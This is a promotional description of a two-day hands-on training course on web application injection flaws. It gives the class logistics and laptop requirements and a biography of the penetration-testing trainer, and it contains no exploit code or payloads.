OWASP rates injection flaws as the most critical vulnerability within the Top 10 most Critical Web Application Security Risks under the OWASP Top 10 project. http://www.owasp.org/index.php/Top_10_2010-A1
Watch Sid talk about the upcoming course here: http://www.ustream.tv/recorded/31958833
This hands-on session will only focus on the injection flaws and the attendees will get an in-depth understanding of the flaws arising from this vulnerability. The topics covered in the class are:
During the 2 days course, the attendees will have access to a number of challenges for each flaw and they will learn a variety of exploitation techniques used by the attackers in the wild. Identify, extract, escalate, execute; we have got it all covered. The following are the objectives of the course:
Students must bring their own laptop with Windows Operating System installed (either natively or running in a VM). Further, students must have administrative access to perform tasks like install software, disable antivirus etc. Devices which don't have ethernet connection (e.g. macbook Air, tablets etc) are not supported. A prior knowledge of Database systems and SQL language will be an added advantage but it's not a strict requirement.
Sumit "sid" Siddharth works as a Head of Penetration testing for 7Safe Limited in the UK. He specializes in the application and database security and has more than 8 years of experience in Penetration Testing. Sid has authored a number of whitepapers and tools. He has been a Speaker/Trainer at many security conferences including Black Hat, DEF CON, OWASP Appsec, HITB etc. He also runs the popular IT security blog: www.notsosecure.com. Sid is also a co-author of the book SQL Injection: Attacks and Defence (2nd edition).